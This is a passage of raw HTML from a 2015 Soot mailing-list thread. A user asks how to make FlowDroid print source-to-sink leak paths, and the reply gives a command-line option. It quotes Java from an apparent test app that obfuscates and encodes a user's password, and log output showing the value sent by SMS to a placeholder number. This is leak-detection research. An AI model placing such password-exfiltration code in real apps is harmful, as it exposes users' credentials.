style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; obfPwd += c + &quot;_&quot;;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; String message = &quot;User: &quot; +<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; user.getName() + &quot; | PWD: &quot; + obfPwd;<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:black;mso-fareast-language:ZH-CN'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; String message_base64 = Base64.encodeToString(message.getBytes(),Base64.DEFAULT);<o:p></o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'>&gt;&gt;&gt;<o:p>&nbsp;</o:p></span></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>Is there solution to handle this?<o:p></o:p></span></b></p><p><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>Grate thanks!!<o:p></o:p></span></b></p><p><b><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></b></p><p><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>Young<o:p></o:p></span></b></p><div style='border:none;border-top:solid #E1E1E1 1.0pt;padding:3.0pt 0cm 0cm 0cm'><p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto'><span lang=EN-US style='mso-fareast-language:ZH-CN'><br></span><b><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>发件人</span></b><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>: </span></b><span lang=EN-US style='mso-fareast-language:ZH-CN'>Steven Arzt<br></span><b><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>发送时间</span></b><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>: </span></b><span lang=EN-US style='mso-fareast-language:ZH-CN'>2015</span><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>年</span><span lang=EN-US style='mso-fareast-language:ZH-CN'>12</span><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>月</span><span lang=EN-US style='mso-fareast-language:ZH-CN'>7</span><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>日</span><span lang=EN-US style='mso-fareast-language:ZH-CN'> 16:33<br></span><b><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>收件人</span></b><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>: </span></b><span lang=EN-US style='mso-fareast-language:ZH-CN'>'XiaoYang';'soot-list@CS.McGill.CA'<br></span><b><span lang=ZH-CN style='mso-fareast-language:ZH-CN'>主题</span></b><b><span lang=EN-US style='mso-fareast-language:ZH-CN'>: </span></b><span lang=EN-US style='mso-fareast-language:ZH-CN'>AW: [Soot-list] print the path from source(s) to sink(s) found by flowdroid</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p></div><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:12.0pt;font-family:SimSun;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'>Hi Xiao,</span><span style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'>That’s possible. You need to enable a path reconstruction algorithm that supports path reconstruction. If you are using the FlowDroid command-line application, just append “--pathalgo contextsensitive” to your command line. It will increase the runtime, though.<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'>Best regards,<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'>&nbsp; Steven<o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-family:"Calibri","sans-serif";color:#1F497D;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><div><div style='border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0cm 0cm 0cm'><p class=MsoNormal align=left style='text-align:left'><b><span lang=EN-US style='font-size:10.0pt;font-family:"Tahoma","sans-serif";mso-fareast-language:ZH-CN'>Von:</span></b><span lang=EN-US style='font-size:10.0pt;font-family:"Tahoma","sans-serif";mso-fareast-language:ZH-CN'> <a href="mailto:soot-list-bounces@CS.McGill.CA">soot-list-bounces@CS.Mc<span lang=DE>Gill.CA</span></a></span><span style='font-size:10.0pt;font-family:"Tahoma","sans-serif";mso-fareast-language:ZH-CN'> [<a href="mailto:soot-list-bounces@CS.McGill.CA">mailto:soot-list-bounces@CS.McGill.CA</a>] <b>Im Auftrag von </b>XiaoYang<br><b>Gesendet:</b> Sonntag, 6. Dezember 2015 04:55<br><b>An:</b> <a href="mailto:soot-list@CS.McGill.CA">soot-list@CS.McGill.CA</a><br><b>Betreff:</b> [Soot-list] print the path from source(s) to sink(s) found by flowdroid<o:p></o:p></span></p></div></div><p class=MsoNormal align=left style='text-align:left'><span style='font-size:11.0pt;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>Hi all,</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>Suppose that I found there is information leak in android application by flowdroid. Could I print the path from source(s) to sink(s)?</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>Take an example. Below is the partial information given by flowdroid.</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>&gt;&gt;[main] INFO soot.jimple.infoflow.Infoflow - The sink virtualinvoke $r10.&lt;android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)&gt;(&quot;+86 123456789&quot;, null, $r6, null, null) in method &lt;com.example.leakpasswd.MainActivity: void onCreate(android.os.Bundle)&gt; was called with values from the following sources:</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>&gt;&gt;[main] INFO soot.jimple.infoflow.Infoflow - - $r2 = virtualinvoke $r0.&lt;com.example.leakpasswd.MainActivity: android.view.View findViewById(int)&gt;(2131230722) in method &lt;com.example.leakpasswd.MainActivity: void onCreate(android.os.Bundle)&gt;</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>I want to get the path from findViewById to sendTextMessage. Is there a method to handle that? </span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>Great thanks!!</span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'>Young </span><span style='mso-fareast-language:ZH-CN'><o:p></o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span lang=EN-US style='font-size:11.0pt;mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p></div></body></html>